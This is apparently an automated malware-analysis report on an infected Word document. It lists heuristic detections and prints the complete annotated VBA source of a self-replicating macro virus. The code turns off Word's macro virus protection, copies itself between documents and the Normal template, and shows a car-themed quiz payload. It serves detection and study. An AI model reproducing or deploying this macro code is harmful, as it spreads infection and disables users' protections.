MALICIOUS
148
Risk Score
Heuristics 4
-
ClamAV: Doc.Trojan.Bptk-2 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Bptk-2
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA macro-virus self-replication / AV tampering — critical — OLE_VBA_MACRO_VIRUS_REPLICATION: The VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
Options.VirusProtection = False -
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 6b8fdff9a927f5d2a4cac4b1926f0740883368bb0dc226d61943bebcaa5c7ba7) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3339 bytes |
Preview script — first 1,000 lines of the extracted script:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst annotation: module-level attributes of the ThisDocument class module as
' decoded by olevba. The two event handlers below (Document_Close / Document_Open)
' share this state; nothing here is user-visible.
'   DI, TI : True when the document (DI) / Normal template (TI) module already
'            contains the marker string searched for in the handlers
'   d, t   : first VBComponent of the active document's / Normal template's VBA project
'   Src    : full module source text being copied between d and t
'   r      : upper-cased user answer read from the quiz InputBox prompts
Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String
' Document_Close — the replication routine behind the OLE_VBA_MACRO_VIRUS_REPLICATION
' finding. On close it compares the first VBA module of the open document (d) with
' that of the Normal template (t) and copies the module source in whichever
' direction leaves both carrying the same code. Indicators a detection rule can key
' on, independent of the ClamAV signature: VBProject / CodeModule access,
' DeleteLines + AddFromString on a module, NormalTemplate.Save, and
' Options.VirusProtection = False.
Private Sub Document_Close()
' Every runtime error (e.g. VBE object-model access refused) is swallowed, so the
' routine fails silently instead of surfacing a dialog to the user.
On Error Resume Next
' d = first module of the active document's project; t = first module of Normal.
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
' Infection markers. Find() searches each module for the quoted string; because
' the string is a literal on this very line, any module holding this code matches,
' so DI / TI become True when the document / template already carries the macro.
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
' Turns off Word's macro virus protection option (the report's critical "AV tampering"
' line). Executed unconditionally, before either copy branch.
Options.VirusProtection = False
' Document infected, template clean: overwrite Normal's module with this code and
' persist it, so the global template now carries the macro.
If DI And Not (TI) Then
Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
t.CodeModule.AddFromString Src
NormalTemplate.Save
' Template infected, document clean: infect the document (label 10), but on the
' first day of the month run the quiz "payload" first.
ElseIf TI And Not (DI) Then
If Day(Now()) = 1 Then
' Three multiple-choice InputBox questions; each loop repeats until a non-empty
' answer is given. A correct answer (B, then C, then C) jumps to label 10.
Do
r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _
& "A.3米4 B.3米5 C.3米55 D.3米7" & Chr(13) & Chr(13) _
& "要好好思考哟!", "紧急提问"))
Loop Until r <> ""
If r = "B" Then
MsgBox "好棒哟!"
GoTo 10
Else
MsgBox "唉!再给你一次机会."
Do
r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _
& "A.标准型 B.普通型 C.豪华型" & Chr(13) & Chr(13) _
& "想好了再回答!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
MsgBox "谢谢你的支持!"
GoTo 10
Else
MsgBox "笨蛋!给你最后一次机会."
Do
r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _
& "A.防止撞车 B.防止侧滑 C.撞车时保护驾驶员" & Chr(13) & Chr(13) _
& "这是最后一次机会哟!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
MsgBox "总算答对了!"
GoTo 10
Else
' Third wrong answer: the document is written to c:\lzc.vxd (a file-system IoC
' worth searching for) and closed; the copy into the document is skipped.
MsgBox "看来你还需要对长安之星多加了解..."
ActiveDocument.SaveAs "c:\lzc.vxd"
ActiveDocument.Close
Exit Sub
End If
End If
End If
End If
' Label 10 is reached directly when it is not the 1st, or after a correct answer:
' the template's module replaces the document's module and the document is saved.
10:
Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines)
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
d.CodeModule.AddFromString Src
ActiveDocument.Save
End If
End Sub
' Document_Open — the handler behind the OLE_VBA_DOCOPEN finding; runs when the
' document is opened. It performs the same marker check as Document_Close, disables
' macro virus protection again, and then empties the module on whichever side
' (document or template) does not yet carry the marker. Document_Close's
' DeleteLines + AddFromString step later rewrites that emptied module. Same
' detection indicators as Document_Close: VBProject / CodeModule access and
' Options.VirusProtection = False.
Private Sub Document_Open()
' Errors are suppressed, so a refused VBE object-model access is silent.
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
' Self-matching marker search (the literal sits in the searched line itself).
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
' Document infected, template clean: wipe the template's first module.
If DI And Not (TI) Then
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
' Template infected, document clean: wipe the document's first module.
ElseIf TI And Not (DI) Then
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
End If
End Sub
|
|||